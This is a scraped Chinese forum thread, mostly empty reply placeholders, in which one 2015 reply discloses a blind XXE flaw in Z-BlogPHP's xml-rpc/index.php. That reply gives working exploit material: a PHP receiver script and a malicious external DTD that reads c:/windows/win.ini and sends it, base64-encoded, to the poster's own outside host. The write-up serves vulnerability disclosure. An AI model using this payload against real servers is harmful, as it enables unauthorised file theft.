最新回复 (359)
全部楼主
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
引用 19楼
-
-
-
-
-
-
引用 25楼 -
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
引用 45楼
-
-
-
-
引用 49楼有漏洞!正常输入密码不会显示 密码输错 就这样显示 我还以为是我的问题呢 换了几台主机都一样
-
-
-
-
-
-
引用 55楼 -
-
-
-
-
-
-
-
-
-
引用 65楼 -
-
-
-
-
-
引用 71楼
-
-
-
引用 74楼本帖最后由 xiaofengfeng 于 2015-8-20 09:29 编辑
[p=25, null, left]@未寒[/p][p=25, null, left]/zb_system/xml-rpc/index.php 641行:
[/p]code 区域$zbp->Load();
Add_Filter_Plugin('Filter_Plugin_Zbp_ShowError','RespondError');
$xmlstring = file_get_contents( 'php://input' );
//Logs($xmlstring);
$xml = simplexml_load_string($xmlstring);[p=25, null, left]
可见,这里直接调用simple_load_string解析XML,造成了一个XML实体注入。
但观察后面的代码发现,需要用户、密码才能执行一些操作,得到回显,否则会报错。
没有回显的情况下,我们怎么来利用XXE,这里就说到一个blind xxe,在这篇文章都有详细的说明:
http://www.7ftx.xyz /web-security/%E5%85%B3%E4%BA%8Eblind-xxe.html
所以原理什么的我就不细说了,实际上我也是一知半解。主要看利用方法。
先在我主机上放一个接收文件的php(http://www.7ftx.xyz /xxe/get.php):
[/p]code 区域<?php
file_put_contents('01.txt', $_GET['xxe_local']);
?>[p=25, null, left]
目的是将$_GET['xxe_local']存入本地文件01.txt。然后再构造一个xml,也保存在我的主机上,这个XML实际上就是真正读取文件的XML:
[/p]code 区域<!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini">
<!ENTITY % int "<!ENTITY % trick SYSTEM 'http://www.7ftx.xyz/xxe/get.php?xxe_local=%payload;'>">
%int;
%trick;[p=25, null, left]
我们看到这个XML,他引用了外部实体c:/windows/win.ini作为payload的值,然后又将payload拼接到 http://www.7ftx.xyz/xxe/get.php?xxe_local=%payload;,进行HTTP请求。[/p][p=25, null, left]
接收到请求的get.php就将这个文件内容保存到01.txt了,形成了一个文件读取的过程。
然后,我们向/zb_system/xml-rpc/index.php发包,让它来加载上面这个XML:
[/p][p=25, null, left][/p][p=25, null, left]
发包过去后,就会请求我们的evil_php.xml,解析这个xml造成XXE攻击,读取c:/windows/win.ini并进行base64编码后传给get.php,最后保存在我们的主机上:
[/p][p=25, null, left]
[p=25, null, left]
用Blind XXE造成一个任意文件读取漏洞。[/p]
漏洞证明:
[p=25, null, left]
[p=25, null, left]
-
-
-
引用 77楼
-
-
-
引用 80楼 -
-
-
-
-
-
-
-
-
-
-
引用 91楼
-
引用 92楼 -
引用 93楼
-
-
-
-
引用 97楼
-
-
引用 99楼 -
-
更新不了,,怎么办,
